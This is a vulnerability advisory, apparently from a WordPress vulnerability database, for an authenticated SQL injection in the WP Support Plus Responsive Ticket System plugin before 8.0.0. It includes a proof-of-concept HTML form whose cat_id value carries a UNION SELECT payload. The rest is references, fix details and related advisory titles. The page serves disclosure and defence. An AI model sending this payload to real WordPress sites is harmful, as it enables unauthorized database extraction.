WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection | Plugin Vulnerabilities

Description

Type user access: any user.

$_POST[‘cat_id’] is not escaped. Is accessible for any user.

Proof of Concept

<form action="http://www.example.com/wp-admin/admin-ajax.php" method="post">
    <input type="text" name="action" value="wpsp_getCatName">
    <input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
    <input type="submit" name="">
</form>

Affects Plugins

wp-support-plus-responsive-ticket-system

Fixed in 8.0.0

References

Exploitdb

URL

https://lenonleite.com.br/en/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/

URL

https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br/

Submitter twitter

Verified

No

WPVDB ID

f267d78f-f1e1-4210-92e4-39cce2872757

Timeline

Publicly Published

2016-12-12 (about 9 years ago)

Added

2016-12-18 (about 9 years ago)

Last Updated

2020-03-08 (about 6 years ago)

Other

Published

Title

Published

2023-12-28

Title

WS Form LITE < 1.9.171 - Authenticated(Administrator+) SQL Injection

Published

2024-05-23

Title

Search & Replace < 3.2.2 - Administrator+ SQL injection

Published

2023-07-24

Title

WordPress Database Administrator <= 1.0.3 - Unauthenticated SQL Injection

Published

2023-07-17

Title

Contact Form to Any API < 1.1.3 - Admin+ SQLi

Published

2024-11-26

Title

Internal Linking for SEO traffic & Ranking – Auto internal links (100% automatic) < 1.2.2 - Authenticated (Administrator+) SQL Injection via post_id Parameter